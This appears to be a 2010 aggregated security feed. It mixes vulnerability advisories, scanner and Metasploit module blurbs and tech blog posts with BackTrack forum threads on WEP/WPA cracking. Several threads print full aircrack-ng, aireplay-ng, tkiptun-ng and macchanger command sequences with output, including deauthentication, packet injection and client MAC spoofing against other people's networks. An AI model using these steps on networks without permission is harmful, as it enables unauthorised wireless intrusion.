Remote attackers can gain sensitive information about a DD-WRT router and internal clients, including IP addresses, MAC addresses and host names. This information can be used for further network attacks as well as very accurate geolocation. This is exploitable even if remote administration is disabled. Version 24-preSP2 is affected.

15:22
Wirevolution
Although phone numbers are an antiquated kind of thing, we are sufficiently beaten down by the machines that we think of it as natural to identify a person by a 10 digit number. Maybe the demise of the numeric phone keypad as big touch-screens take over will change matters on this front. But meanwhile, phone numbers are holding us back in important ways. Because phone numbers are bound to the PSTN, which doesn’t carry video calls, it is harder to make video calls than voice calls, because we don’t have people’s video addresses so handy.
This year, three new products attempted to address this issue in remarkably similar ways – clearly an idea whose time has come. The products are Apple’s FaceTime, Cisco’s IME and a startup product called Tango.
In all three of these products, you make a call to a regular phone number, which triggers a video session over the Internet. You only need the phone number – the Internet addressing is handled automatically. The two problems the automatic addressing has to handle are finding a candidate address, then verifying that it is the right one. Here’s how each of those three new products does the job:
1. FaceTime. When you first start FaceTime, it sends an SMS (text message) to an Apple server. The SMS contains sufficient information for the Apple server to reliably associate your phone number with the XMPP (push services) client running on your iPhone. With this authentication performed, anybody else who has your phone number in their address book on their iPhone or Mac can place a videophone call to you via FaceTime.
2. Cisco IME (Inter-Company Media Engine). The protocol used by IME to securely associate your phone number with your IP address is ViPR (Verification Involving PSTN Reachability), an open protocol specified in several IETF drafts co-authored by Jonathan Rosenberg, who is now at Skype. ViPR can be embodied in a network box like IME, or in an endpoint like a phone or PC.
Here’s how it works: you make a phone call in the usual way. After you hang up, ViPR looks up the phone number you called to see if it is also ViPR-enabled. If it is, ViPR performs a secure mutual verification, using proof-of-knowledge of the previous PSTN call as a shared secret. The next time you dial that phone number, ViPR makes the call through the Internet rather than through the phone network, so you can do wideband audio and video with no per-minute charge. A major difference between ViPR and FaceTime or Tango is that ViPR does not have a central registration server. The directory that ViPR looks up phone numbers in is stored in a distributed hash table (DHT). This is basically a distributed database with the contents stored across the network. Each ViPR participant contributes a little bit of storage to the network. The DHT itself defines an algorithm – called Chord – which describes how each node connects to other nodes, and how to look up information.
3. Tango, like FaceTime, has its own registration servers. The authentication on these works slightly differently. When you register with Tango, it looks in the address book on your iPhone for other registered Tango users, and displays them in your Tango address book. So if you already know somebody’s phone number, and that person is a registered Tango user, Tango lets you call them in video over the Internet.

13:00
Hack a Day
[Sprite_TM] cooked up an amazing hack by resurrecting a Mac SE using a Dockstar and ARM processor. The retro hardware had a bad mainboard thanks to the corrosive properties of a failed backup-battery. He had been wanting to do something with the Seagate Dockstar and decided it would find a nice home in the Mac. [...]

12:00
Hack a Day
Evil Mad Scientist Laboratories is preparing for Halloween with this standby-mode pumpkin. Inside there’s an LED plugging a hole that is drilled just to the skin of the gourd-like vegetable. It fades in and out similar to a sleeping Mac, using what we think is a vastly over-powered circuit based on an ATtiny2313 (1k of [...]

5:34
Hack a Day
[Enigma-penguin] built a tablet computer out of a Core2Duo Macbook circa 2007. The battery exploded, damaging the case and a few components inside. But there was hope for a new life as a tablet computer. He removed the screen and tested to make sure the computer would still function without it by using the video [...]

13:45
remote-exploit & backtrack
Hello, friends.
Do you know of any way to increase the (always short: 10 or so) number of entries in the Static DHCP List that routers tend to have?
I am talking about the IP assignment that a certain MAC connecting to the local network will have.
Thanks :).

13:01
Packet Storm Security Tools
NMB Scanner scans the shares of an SMB network, using the NMB and SMB protocols. It is useful for acquiring information on a local area network for such purposes as security auditing. It can obtain such information as NMB/SMB/Windows hostname, IP address, IP hostname, ethernet MAC address, Windows username, NMB/SMB/Windows domain name, and master browser. It can discover all the NMB/SMB/Windows hosts on a local area network by using the host lists maintained by master browsers.

17:29
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2010-156 - The FT_Stream_EnterFrame function in base/ftstream.c in FreeType before 2.4.2 does not properly validate certain position values, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted font file. Array index error in the t42_parse_sfnts function in type42/t42parse.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service or possibly execute arbitrary code via negative size values for certain strings in FontType42 font files, leading to a heap-based buffer overflow. FreeType before 2.4.2 uses incorrect integer data types during bounds checking, which allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted font file. Buffer overflow in the Mac_Read_POST_Resource function in base/ftobjs.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted Adobe Type 1 Mac Font File font. bdf/bdflib.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service via a crafted BDF font file, related to an attempted modification of a value in a static string. Unspecified vulnerability in FreeType 2.3.9, and other versions before 2.4.2, allows remote attackers to cause a denial of service via vectors involving nested Standard Encoding Accented Character calls, related to psaux.h, cffgload.c, cffgload.h, and t1decode.c.
17:29 - Packet Storm Security Advisories
Mandriva Linux Security Advisory 2010-157 - The FT_Stream_EnterFrame function in base/ftstream.c in FreeType before 2.4.2 does not properly validate certain position values, which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted font file. Array index error in the t42_parse_sfnts function in type42/t42parse.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service or possibly execute arbitrary code via negative size values for certain strings in FontType42 font files, leading to a heap-based buffer overflow. FreeType before 2.4.2 uses incorrect integer data types during bounds checking, which allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted font file. Buffer overflow in the Mac_Read_POST_Resource function in base/ftobjs.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted Adobe Type 1 Mac Font File font. bdf/bdflib.c in FreeType before 2.4.2 allows remote attackers to cause a denial of service via a crafted BDF font file, related to an attempted modification of a value in a static string. The updated packages have been patched to correct these issues.
19:03 - Packet Storm Security Tools
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Linux 64bit binary release.
19:03 - Packet Storm Security Tools
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Linux 32bit binary release.
19:03 - Packet Storm Security Tools
Harald Scan is a Bluetooth discovery scanner. It determines Major and Minor device classes according to the Bluetooth SIG specification and attempts to resolve a device's MAC address to the largest known vendor/MAC address list. Written in Python. This is the Mac OSX source release.
22:51 - Packet Storm Security Tools
Kismet is an 802.11 layer 2 wireless network sniffer. It can sniff 802.11b, 802.11a, and 802.11g traffic. It is capable of sniffing using almost any wireless card supported in Linux, which currently divide into cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Besides Linux, Kismet also supports FreeBSD, OpenBSD and Mac OS X systems. Features: multiple packet capture sources; runtime network sorting by AP MAC address (BSSID); IP block detection via ARP and DHCP packet dissection; Cisco product detection via CDP; Ethereal- and tcpdump-compatible file logging; Airsnort-compatible "interesting" (cryptographically weak) packet logging; secure SUID behavior; GPS device and wireless device fingerprinting. Kismet also includes a tool called gpsmap that can be used to create maps from logged GPS data.
18:35 - SecuriTeam
A Denial of Service vulnerability was discovered in Skype for Mac.
18:24 - Wirevolution
A while back the Wi-Fi Alliance announced a new certification program, Wi-Fi Direct, which enables a PC to connect directly with other Wi-Fi devices without having to go through an Access Point.
The Wi-Fi certification process for Wi-Fi Direct is scheduled to be launched by the end of 2010, but there are already two pre-standard implementations of this concept, My Wi-Fi, an Intel product which ships in Centrino 2 systems, and Wireless Hosted Network which ships in all versions of Windows 7.
The Wi-Fi Direct driver makes a single Wi-Fi adapter on the PC look like two to the operating system: one ordinary one that associates with a regular Access Point, and a second acting as a “Virtual Access Point.” The virtual access point (Microsoft calls it a “SoftAP”) actually runs inside the Wi-Fi driver on the PC (labeled WPAN I/F in the Intel diagram below).

To the outside world the Wi-Fi adapter also looks like two devices, each with its own MAC address: one the PC just like without Wi-Fi Direct, and the other an access point. Devices that associate with that access point join the PC’s PAN (Personal Area Network).
This yields several benefits in various use cases.
I wrote a couple of years ago about how a company called Ozmo planned to use a Wi-Fi PAN to connect peripherals to PCs, replacing Bluetooth and proprietary wireless technologies. That plan has now come to fruition. Earlier this month Ozmo announced that it had received $10.8 million in additional funding, and this week it announced two major customers: Primax, a leading ODM of wireless mice, and NMB Technologies, a leading ODM of wireless keyboards.
Here’s a slide from one of their promotional presentations giving a comparison with Bluetooth and proprietary technologies:

The essence of Ozmo’s approach is low cost, multi-device, low bandwidth and low power consumption. Wi-Fi Direct has another use case that is high bandwidth, with no requirement for low power.
If you want to stream video from your PC to a monitor using traditional Wi-Fi (“infrastructure mode”) each packet goes from the PC to the access point, then from the access point to the TV, so it occupies the spectrum twice for each packet. Wi-Fi Direct effectively doubles the available throughput, since each packet flies through the ether only once, directly from the PC to the TV. But it actually does better than that. Supposing the PC and the TV are in the same room, but the access point is in a different room, the PC can transmit at much lower power. Another similar Wi-Fi Direct session can then happen in another room in the house. Without Wi-Fi direct the two sessions would have to share the access point, taking turns to use the spectrum. So we get increased aggregate throughput both from halving the number of packet transmissions, and from allowing simultaneous use of the spectrum by multiple sessions (if they are far enough apart).
A Wi-Fi buff would point out that you can already do all this with ad-hoc mode, but Wi-Fi Direct purports to be usable by mortals, and to work interoperably, neither of which could be said for ad-hoc mode until recently. In January Infinitec announced a new point-to-point video streaming product that claims to be easy to use and universally interoperable, that Engadget implies uses ad-hoc mode, though Google can’t find the words “ad hoc” on the Infinitec website.
Between the bandwidth extremes of mice and TVs, lie numerous other potential uses, like headsets (which Ozmo also supports); syncing phones, cameras and media players; and wireless printers.
9:04 - Packet Storm Security Exploits
This Metasploit module exploits a stack buffer overflow vulnerability in the handling of the TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft, the PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as Office 2004 for Mac, are vulnerable. NOTE: The vulnerable code path is not reachable on versions of Windows prior to Windows Vista.
0:33 - remote-exploit & backtrack
Hello everyone, :D
I have followed lots of posts in order to crack my WEP key, and I managed to find the key of my Livebox (thanks to everyone who wrote those many posts), but afterwards I can't find how to connect to the Internet under Backtrack. I haven't tried under Windows (since under Backtrack I used macchanger) in order to retrieve the key.
I suppose that under Windows it will take my real MAC and throw me off since I don't have the right MAC. Now you'll tell me "try before posting", but since it was nearly three o'clock this morning and I had to perform at work, I didn't take the time to try. And besides, I like to understand how all this works.
Thank you for your answers.
2:03 - remote-exploit & backtrack
Hi guys.
I'll try to be thorough.
Following the recommendations of many posters here, I recently acquired an ALFA AWUS036H (rtl8187 driver) and am trying to break into my (own: I do not endorse illegal activity in any way) WEP-enabled router.
I am not in the habit of posting in forums for basic inquiries (as most information is on Google these days if one searches enough), but I find myself in need of assistance.
I am running BackTrack 4 final (released 11.01.2010) and issuing the following commands:
Code:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
airodump-ng --channel <X> --bssid <XXXX...> -w <path> wlan0
aireplay-ng -1 0 -e <XXXX...> -a <XXXX...> -h <XXXX...> wlan0
Filling in the stuff in <>, naturally.
However, I fail to get the association succeeded :-) message.
On the contrary, I get DeAuth'ed and I can't seem to understand why.
(In fact, it loops on:
Code:
Sending Authentication Request
Authentication successful
Sending Association Request
sometimes with [ACK], and sometimes with a "received a deauth packet!")
The aireplay-ng --test succeeds with 30/30 and I've tried the fake auth at various places around the house, with the same result. I've also disabled MAC filtering and tried variations of the aireplay-ng -1, such as the more detailed -1 attack on the aircrack wiki, and with -x 180 to limit packets, but to no avail.
The Association Succeeded :-) message has appeared briefly once however, after I macchanged my wlan0 to one of the connected PC's. The #/s rating jumped, and the ARP attack looked like it was working. I wasn't using keep-alive though and eventually got deauthed, and using the same mac address spoof associated no longer thereafter (rather, it gets deauth packets like mad).
I've read around and some other people have had similar problems, though I couldn't find a clear solution. If the answer to this has been posted elsewhere and I've missed it in my search, could someone please point me to it? Any help is appreciated.
13:11 - remote-exploit & backtrack
I tried to crack a WEP network with BackTrack4 and my VAIO Z laptop.
My wireless card was:
Code:
root@bt:~# airmon-ng
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
I changed it to monitor mode:
Code:
root@bt:~# airmon-ng start wlan0 6
Interface Chipset Driver
wlan0 Intel 4965/5xxx iwlagn - [phy0]
(monitor mode enabled on mon0)
And then I test injection:
Code:
root@bt:~# aireplay-ng -9 mon0
20:59:17 Trying broadcast probe requests...
20:59:17 Injection is working!
20:59:19 Found 1 AP
20:59:19 Trying directed probe requests...
20:59:19 00:23:F8:84:31:1B - channel: 6 - 'Shatel'
20:59:21 Ping (min/avg/max): 1.436ms/3.492ms/7.525ms Power: -57.70
20:59:21 30/30: 100%
Then I started collecting IVs:
Code:
root@bt:~# airodump-ng -c 6 --bssid 00:23:F8:84:31:1B -w output mon0
CH 6 ][ BAT: 21 mins ][ Elapsed: 15 mins ][ 2010-03-11 20:51
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:23:F8:84:31:1B -21 100 8943 178 0 6 54 WEP WEP OPN Shatel
BSSID STATION PWR Rate Lost Packets Probes
00:23:F8:84:31:1B 00:24:D6:11:62:18 0 0 - 1 0 411384
And then I made a fake authentication:
Code:
root@bt:~# macchanger -s mon0
Current MAC: 00:24:d6:11:62:18 (unknown)
root@bt:~# aireplay-ng -1 6000 -o 1 -q 10 -e Shatel -a 00:23:F8:84:31:1B -h 00:24:D6:11:62:18 mon0
21:17:45 Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6
21:17:45 Sending Authentication Request (Open System) [ACK]
21:17:45 Authentication successful
21:17:45 Sending Association Request [ACK]
21:17:45 Association successful :-) (AID: 1)
21:17:55 Sending keep-alive packet
And finally I started injection:
Code:
root@bt:~# aireplay-ng -3 -b 00:23:F8:84:31:1B -h 00:24:d6:11:62:18 mon0
20:36:51 Waiting for beacon frame (BSSID: 00:23:F8:84:31:1B) on channel 6
Saving ARP requests in replay_arp-0311-203651.cap
You should also start airodump-ng to capture replies.
Read 10150 packets (got 45 ARP requests and 2 ACKs), sent 424647 packets...(500 pps)
But injection didn't make any change in the speed of collecting packets (#/s).
I did this again:
Code:
root@bt:~# aireplay-ng -9 mon0
21:22:49 Trying broadcast probe requests...
21:22:51 No Answer...
21:22:51 Found 3 APs
21:22:51 Trying directed probe requests...
21:22:51 00:27:19:D8:B0:C2 - channel: 6 - 'TP-LINK_D8B0C2'
21:22:57 0/30: 0%
21:22:57 00:23:F8:84:31:1B - channel: 6 - 'Shatel'
21:23:03 0/30: 0%
21:23:03 00:80:48:3D:12:27 - channel: 6 - 'mecom.wifi.BG'
21:23:09 0/30: 0%
and it seems that injection is not working!
What should I do?! How can I collect IVs faster?! (Now it takes days [or weeks!] to collect enough packets!)
Thanks!
15:05 - remote-exploit & backtrack
so that my computer, as for my MAC address, does not appear on the router's DHCP table or any other data logs.
Thanks in advance.
5:54 - remote-exploit & backtrack
Run TKIP keystream discovery attack:
root@bt:~# tkiptun-ng -a 00:18:39:D3:FB:A0 -h 00:1E:65:F8:BA:A8 -m 80 -n 100 wlan0
Blub 2:38 E6 38 1C 24 15 1C CF
Blub 1:17 DD 0D 69 1D C3 1F EE
Blub 3:29 31 79 E7 E6 CF 8D 5E
08:24:01 Michael Test: Successful
08:24:01 Waiting for beacon frame (BSSID: 00:18:39:D3:FB:A0) on channel 2
08:24:01 Found specified AP
08:24:01 WPA handshake: 00:18:39:D3:FB:A0 captured65:F8:BA:A8] [ 6| 3 ACKs]
08:24:01 Sending 4 directed DeAuth. STMAC: [00:1E:65:F8:BA:A8] [ 9| 6 ACKs]
08:24:02 Waiting for an ARP packet coming from the Client...
Saving chosen packet in replay_src-0329-082409.cap
08:24:09 Waiting for an ARP response packet coming from the AP...
Saving chosen packet in replay_src-0329-082409.cap
08:24:09 Got the answer!
08:24:09 Waiting 10 seconds to let encrypted EAPOL frames pass without interfering.
08:24:31 Offset 81 ( 0% done) | xor = 49 | pt = 40 | 122 frames written in 100055ms
08:25:47 Offset 80 ( 2% done) | xor = 8B | pt = 2A | 155 frames written in 127108ms
08:27:03 Offset 79 ( 4% done) | xor = 39 | pt = 01 | 163 frames written in 133657ms
08:28:18 Offset 78 ( 7% done) | xor = 03 | pt = F4 | 144 frames written in 118079ms
08:29:34 Offset 77 ( 9% done) | xor = EF | pt = 6F | 157 frames written in 128742ms
08:30:42 Offset 76 (11% done) | xor = 76 | pt = 95 | 75 frames written in 61500ms
08:32:01 Offset 75 (14% done) | xor = BA | pt = 67 | 187 frames written in 153338ms
08:33:06 Offset 74 (16% done) | xor = 03 | pt = 14 | 54 frames written in 44279ms
08:34:25 Offset 73 (19% done) | xor = 02 | pt = A4 | 190 frames written in 155801ms
08:35:32 Offset 72 (21% done) | xor = F0 | pt = 3F | 67 frames written in 54943ms
08:36:52 Offset 71 (23% done) | xor = D5 | pt = 93 | 193 frames written in 158255ms
08:38:15 Offset 70 (26% done) | xor = 7D | pt = 1D | 230 frames written in 188622ms
Sleeping for 60 seconds.36 bytes still unknown
ARP Reply
Checking 192.168.x.y
08:38:15 Reversed MIC Key (FromDS): D6:16:91:B7:23:03:E4:25
Saving plaintext in replay_dec-0329-083815.cap
Saving keystream in replay_dec-0329-083815.xor
08:38:15
Completed in 836s (0.05 bytes/s)
08:38:15 AP MAC: 00:18:39:D3:FB:9E IP: 192.168.0.1
08:38:15 Client MAC: 00:1E:65:F8:BA:A8 IP: 192.168.0.103
08:38:15 Sent encrypted tkip ARP request to the client.
08:38:15 Wait for the mic countermeasure timeout of 60 seconds.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Looks like mic failure report was not detected.Waiting 60 seconds before trying again to avoid the AP shutting down.
Sent 1172 packets, current guess: 8F...
Failure: got several deauthentication packets from the AP - you need to start the whole process all over again, as the client got disconnected.
root@bt:~#
Conclusions:
1. The Win7/WinXP WPA supplicant ignores the AP key renewal timeout and never performs rekeying.
2. The same applies to WM6.0/6.1 with HP iPAQ614C and HTC Touch Viva T2223 smartphones.
3. Linux WPA supplicants perform key renewal according to the AP settings.
5:51 - remote-exploit & backtrack
Victim:
Model: HP 6310b
CPU: Intel(R) Core(TM) Duo CPU P8700 2.53GHz
Memory: 4GB
OS: Windows 7
Wireless Interface: Intel(R) WiFi Link 5100 AGN
WiFi security: WPA2/WPA-Enterprise with EAP-TLS (smartcard or certificate) authentication, TKIP encryption
MAC address: 00:1E:65:F8:BA:A8
Attacker:
Model: Dell Optiplex GX270
CPU: Intel Pentium 4 2.60 GHz
Memory: 1GB
OS: BT4F
Wireless Card: Alfa AWUS360H with 7dB omnidirectional antenna
AP:
Model: Linksys WRT54GL v1.1
Firmware: v4.30.11, Aug. 17, 2007
Wireless security and settings: WPA2-Enterprise, AES+TKIP encryption, QoS/WMM, Key Renewal Interval=900s
BSSID: 00:18:39:D3:FB:A0
Radius server: FreeRADIUS-2.0.2, EAP-TLS authentication with X.509 certificates and DH key exchange
Run airodump-ng for WPA:
root@bt:~# airodump-ng -c 2 -w dump wlan2
CH 2 ][ Elapsed: 16 s ][ 2010-03-29 08:10 ][ WPA handshake: 00:18:39:D3:FB:A0
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:D3:FB:A0 -44 100 158 202 3 2 54e. WPA TKIP MGT cuckoo
00:1F:33:FF:39:52 -77 0 154 0 0 2 54e. OPN NETGEAR
BSSID STATION PWR Rate Lost Packets Probes
00:18:39:D3:FB:A0 00:1E:65:F8:BA:A8 -30 54e-54e 1 143
00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -36 0 - 1 101 125
^C
root@bt:~#
Run airodump-ng for WPA2:
root@bt:~# airodump-ng -c 2 -w dump wlan2
CH 2 ][ Elapsed: 3 mins ][ 2010-03-29 08:24 ][ WPA handshake: 00:18:39:D3:FB:A0
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:18:39:D3:FB:A0 -40 100 1887 4249 0 2 54e. WPA2 CCMP MGT cuckoo
00:1F:33:FF:39:52 -72 0 1833 0 0 2 54e. OPN NETGEAR
00:1E:65:F8:BA:A8 -37 0 0 0 0 113 -1 <length: 0>
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:24:8C:57:8F:D3 -68 0 - 2 0 8
00:18:39:D3:FB:A0 00:1E:65:F8:BA:A8 -29 54e-54e 0 4287 cuckoo
00:1F:33:FF:39:52 00:18:39:D3:FB:A0 -36 1e- 1 0 8
00:1F:33:FF:39:52 00:12:F0:8A:7C:B1 -37 0 - 1 159 1028
^C
Change attacker's MAC address:
root@bt:~# ifconfig wlan0 down
root@bt:~# macchanger --mac 00:1E:65:F8:BA:A8 wlan0
Current MAC: 00:c0:ca:1b:f8:b7 (Alfa, Inc.)
Faked MAC: 00:1e:65:f8:ba:a8 (unknown)
root@bt:~# ifconfig wlan0 up
(To be Continued)
15:19 - remote-exploit & backtrack
I recently installed BackTrack 4 on my macbook pro. While the installation for backtrack completed successfully, the mac side had an error. When partitioning the hard drive, I made the BackTrack 4 the root and left the mac side of the hard drive to the default that it had been set at. After installing BackTrack the mac side of the computer was not seen. When looking at the partition in BackTrack I saw that the mac side was not recognizable. I do not think the partition was wiped clean, but at the same time, I have no idea how to get it back and running. Any help is greatly appreciated!
10:06 - remote-exploit & backtrack
Hi BT users,
I am doing an experiment in which I am trying to get an energy-saving protocol into the 802.11 MAC layer.
I am using Orinoco cards in ad-hoc mode and 2 computers with Ubuntu 8.10.
I am planning to switch over to BT4 as I need to dump the packets and then analyse them for throughput etc.
I am using tcpdump/wireshark for this.
In the next stage I am going to fix the power of both cards, vary the distances and analyse the loss in packets.
Can someone recommend me utilities specifically in BT4?
Lastly, I am planning to make one node the master and inject the protocol using some utility. Please recommend me utilities to achieve my experiment.
Thanks in advance
17:00 - Packet Storm Security Recent Files
ARP Sniff (Sniffer Lite) is a tiny ARP sniffer. This tool will be useful to analyze the ARP packets in the network. The tool gives out two types of information, the 14 byte Ethernet header and 28 byte ARP header. The tool requires G++ compiler and a libpcap package. Three arguments are coded as of now. One is to list the available devices, second is to sniff the default device and third is to sniff the device given as argument. The sniffer outputs the Ethernet header (Source MAC address, Destination MAC address and Ethernet type), ARP Header (Hardware type, Protocol type, Hardware address length, Protocol address length, Opcode, Source Hardware address and Protocol address, Destination hardware address and Protocol address).
10:33 - Hack a Day
[Jake Howe] brought his 1984 Mac up-to-date by cramming new guts inside of the classic case. The goal from the start was to run OS X Snow Leopard on the machine without altering the externals. He heated and formed acrylic around the original CRT screen to make a bezel for the replacement LCD screen. The [...]
13:07 - remote-exploit & backtrack
Problem with station mac because it withdraws five with six why in one bssid
10:03 - remote-exploit & backtrack
Hi,
Can a WEP key be cracked when the target router uses MAC address filtering?
Thanks in advance.
16:57 - remote-exploit & backtrack
How do I retrieve the client MAC from my cap file?
I'm using "airodump-ng -c 11 --bssid 00:11:22:33:44:55 -w output-home mon0" to filter by the AP I'm monitoring.
Apparently a client connected, because I see that I have collected 75 IVs, but I didn't see the client MAC (I'm assuming it refreshed out, or whatever) by the time I saw the data numbers. So, I'm hoping to get the client MAC from the cap file.
Feel free to point me to a related post, but I didn't find one via search.
Thanks!
10:57 - remote-exploit & backtrack
Hi all,
I have a little question!
We've set up an AP with a WEP shared key and I assumed that a hacker may have my WEP!!
So we decided to limit the MAC addresses of the wireless cards!
Is there any way that someone can fake these MACs or bypass this limitation anyway?
I read that if this limitation is present, with a tcpdump command it is possible to notice
this by getting a deauth result, so I want to know: can this limitation protect my AP?!
9:11 - remote-exploit & backtrack
Tried to recover the key in clientless mode (the data are not real, but the various commands are exact)
airodump-ng -c 11 -b 00:1A:C1:15:BE:34 -w cap mon0
CH 11 ][ Elapsed: 3 mins ][ 2010-02-26 13:34
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
00:1A:C1:15:BE:34 -74 100 1986 0 0 11 54 . WEP WEP OPN 3
BSSID STATION PWR Rate Lost Packets Probes
So far everything OK, no client, chopchop attack
aireplay-ng -1 0 -a 00:1A:C1:15:BE:34 -h 00:E0:4C:05:1A:32 mon0 (command to associate)
13:31:11 Waiting for beacon frame (BSSID: 00:1A:C1:15:BE:34) on channel 11
13:31:11 Sending Authentication Request (Open System) [ACK]
13:31:11 Authentication successful
13:31:11 Sending Association Request [ACK]
13:31:11 Association successful :-) (AID: 1)
So far everything OK, at least in my opinion.
aireplay-ng -4 -b 00:1A:C1:15:BE:34 -h 00:E0:4C:05:1A:32 mon0
13:31:29 Waiting for beacon frame (BSSID: 00:1A:C1:15:BE:34) on channel 11
^Cad 1502 packets...
Here I think there is a problem: shouldn't it have opened a different window and then asked me to confirm with Y? Instead it started without asking me anything and just ran like that forever?
It should have responded like this:
Read 165 packets...
Size: 86, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:14:6C:7E:40:80
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:40:F4:77:E5:C9
0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@.
0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.."
0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C
0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s
0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i.
0x0050: cfeb 4a72 be46 ..Jr.F
Use this packet ? y
7:04 - remote-exploit & backtrack
Hi all,
I tried to crack a friend's WEP-encrypted AP with aircrack-ng (command line; if any GUI exists, please let me know).
I use these commands:
sudo airmon-ng start wlan0 5
sudo airodump-ng --ivs -w Erix -c 5 wlan0
sudo aireplay-ng -5 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
sudo aireplay-ng -1 0 -e Torkanet -a 00:00:00:00:00:00 -h00:00:00:00:00:00 wlan0
(The MAC addresses are different, but the AP is Torkanet :D and it is on channel 5)
This is when no clients are present!
And these commands when we use a client:
sudo airmon-ng start wlan0 5
sudo airodump-ng --ivs -w Erix -c 5 wlan0
sudo aireplay-ng -0 10 -a 00:00:00:00:00:00 -c 00:00:00:00:00:00 wlan0
sudo aireplay-ng -3 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
The problem is, when aircrack-ng gets packets it says ".....still nothing, trying another package"; it does this over and over and over until I run low on physical memory :D!! What should I do?
Is our network secured enough?
And another silly question :D on this command:
sudo aireplay-ng -5 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0
Which MAC address is mine and which is for the AP? (The same question goes for the -3 option!!)
By the way, sorry for my weak English!! :D
12:00 - Hack a Day
[Robert] wrote a program using Max/MSP that lets him make music with his guitar hero controller. There’s another video after the break where he walks through the various features but here’s the gist of it. This works on Mac and Windows and allows a sort of ‘live play’ or midi mapping mode. In the midi [...]
18:13 - remote-exploit & backtrack
Okay, so i've been searching for about 2 days and can't find a solution... It's getting frustrating. The things I have found aren't very user friendly in explanation or seem to be really out dated. I have a MacBook Pro running BT4 Final and can't get the right click working. Have tried messing with the xorg.conf file and just can't seem to get it exactly. Any help or links to some place that would explain it in the least confusing fashion would be awesome. :) Thanks in advance for any help.
14:51 - remote-exploit & backtrack
I am having a little problem with capturing my WPA handshake. NOTE: This is for MY home network. I have even tried turning the connected computer off and unplugging it from the router, also turning the router off and back on. NOTHING works; I simply can not capture MY handshake. I attend college as a Network Admin, where I captured my school's handshake, but I believe this is because there are always lots of people connected to the network. I can't remember if I even had to deauth a computer, although now I think of it I believe I did, as well as spoofed my MAC. NOTE: I am not spoofing my MAC for my home network. Can someone please help?
0:00 - remote-exploit & backtrack
Ok, so I got a pickle here and wanted to know if anyone ran into this.
Went with Verizon FiOS and they have their own routers, because I am assuming fiber optics? For giggles I tried to crack the new router at my house and it won't let me inject into it. Works fine for my Linksys one, but for some reason their router seems to be something new. There is something else new: you know it tells you the speed of the connection, like 54 (Mbps)? Well, it says 54e.
Wait, did some research: is this a case of MAC address filtering? If so, how do I adapt?
Also, does that "e" mean that there is in fact MAC address filtering going on?
8:33 - remote-exploit & backtrack
Hi,
I would like to know what you think of the Wi-Fi security level of my Freebox.
I use a WPA (TKIP + AES) Wi-Fi key of 63 randomly generated characters.
In addition I have enabled the router and allowed a DHCP pool of 12 addresses used by all my Wi-Fi devices.
And for each of the IP addresses I have reserved the MAC address of one of my devices.
So no IP address is available to an unknown MAC address.
Do you think it is possible to crack my network without knowing my MAC addresses? Can these MAC addresses be found remotely?
Thanks
23:59 - remote-exploit & backtrack
Dear back|track users,
I have been experiencing a problem:
Previous search terms -
Searched google and BT for terms along the lines of:
mac spoof(ing) aireplay fake auth(entication) deauthentication packet
and any combination of those, but have not found a definitive answer that addresses the difficulty I'm experiencing.
Platform -
back|track4 pre-final live USB
card1: intel 5100 (bleeding edge driver from dec 2009)
card2: alfa AWUS036H (native rtl8187 drivers from BT4-prefinal)
target AP: Personal D-link router WBR-1310 (10 ft away)
NO MAC filtering set on target AP, WEP enabled
Description of problem:
Boot up BT4
airmon-ng start wlan0 (for alfa)
airodump-ng -c 1 mon0 (to fix the channel at 1)
aireplay-ng -1 0 -a $AP mon0 (attempt fake auth)
==> Fake auth success
change mac:
original mac: XX:XX:XX:XX:XX:BA
new mac : XX:XX:XX:XX:XX:BB (or any other change)
ifconfig wlan0 down; ifconfig mon0 down;
macchanger -m XX:XX:XX:XX:XX:BB wlan0
